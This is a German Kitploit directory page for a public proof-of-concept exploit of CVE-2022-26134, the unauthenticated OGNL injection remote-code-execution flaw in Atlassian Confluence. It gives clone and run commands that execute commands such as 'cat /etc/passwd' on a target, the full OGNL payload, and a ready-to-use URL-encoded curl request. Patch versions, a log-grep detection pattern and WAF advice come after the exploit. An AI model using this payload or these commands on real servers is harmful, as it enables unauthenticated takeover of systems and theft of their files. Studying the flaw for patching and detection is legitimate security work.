Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26134 — Atlassian Confluence (CVE-2022-26134) - Nicht authentifizierte OGNL-Injection-Schwachstelle (RCE). | Kitploit
Tools/GitHubGitHub/debajyoti0-0/cve-2022-26134
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubdebajyoti0-0/cve-2022-26134

CVE-2022-26134

Atlassian Confluence (CVE-2022-26134) - Nicht authentifizierte OGNL-Injection-Schwachstelle (RCE).

Repository anzeigen
311vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-26134 - OGNL-Injection-Schwachstelle:

Proof-of-Concept-Skript, das die Remote-Codeausführungs-Schwachstelle ausnutzt, die Atlassian Confluence 7.18 und niedrigere Versionen betrifft. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence-Server- oder Data-Center-Instanz auszuführen.

Betroffene Versionen:

Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
Confluence-Server- und Data-Center-Versionen nach 1.3.0 und unter 7.18.1 sind betroffen.
Die Schwachstelle hat einen CVSS-Score von 10 von 10 und gilt damit als kritisch.

Abhängigkeiten:

  • Python 3.3+
  • Die Abhängigkeiten können wie folgt installiert werden:
pip install -r requirements.txt

Verwendung:

Klonen Sie das Repository:

git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

Anschließend können Sie den Exploit mit einem Befehl Ihrer Wahl wie folgt ausführen:

python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"

Payload:

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Beispiel mit CURL-Befehl:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Das Ergebnis des Befehls wird anschließend im Parameter X-Cmd-Response im Antwort-Header angezeigt.

Empfohlene Gegenmaßnahmen vom Hersteller:

Befolgen Sie die offiziellen Empfehlungen von Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Patchen:

Atlassian hat ein Advisory für die von dieser CVE betroffenen Produkte veröffentlicht, das Sie hier lesen können. Um das Problem zu beheben, müssen Sie Ihre Confluence-Version aktualisieren. Die zum Zeitpunkt der Veröffentlichung vorgeschlagene Liste lautet:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

Erkennung - Logdateien:

Confluence ist ein Apache-Tomcat-Server, dessen Protokolle unter /opt/atlassian/confluence/logs gespeichert werden. Sie können Befehle wie grep verwenden, um in den Logs nach HTTP-GET-Anfragen zu suchen, deren Payloads die Java-Laufzeitumgebung zur Ausführung von Befehlen nutzen. Zum Beispiel:

grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in der Datei catalina.out

Erkennungsmöglichkeiten:

Diese Schwachstelle betrifft alle selbst gehosteten Instanzen. Wenn Sie eine WAF verwenden, können Sie URLs blockieren, die ${ enthalten.

YARA (von Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

Weiterführendes Lesematerial:

  • NIST-Eintrag in der National Vulnerability Database (CVE-2022-26134)
  • Hunting for Confluence RCE [CVE-2022–26134]
  • Exploring and remediating the Confluence RCE
  • What is OGNL Injection?
  • Citrix: Guidance for reducing unauthenticated OGNL injection RCE
  • Exploring OGNL Injection in Apache Struts

Hinweis:

NUR FÜR BILDUNGSZWECKE.

CVE-2022-26134 meme fire

Tool herunterladen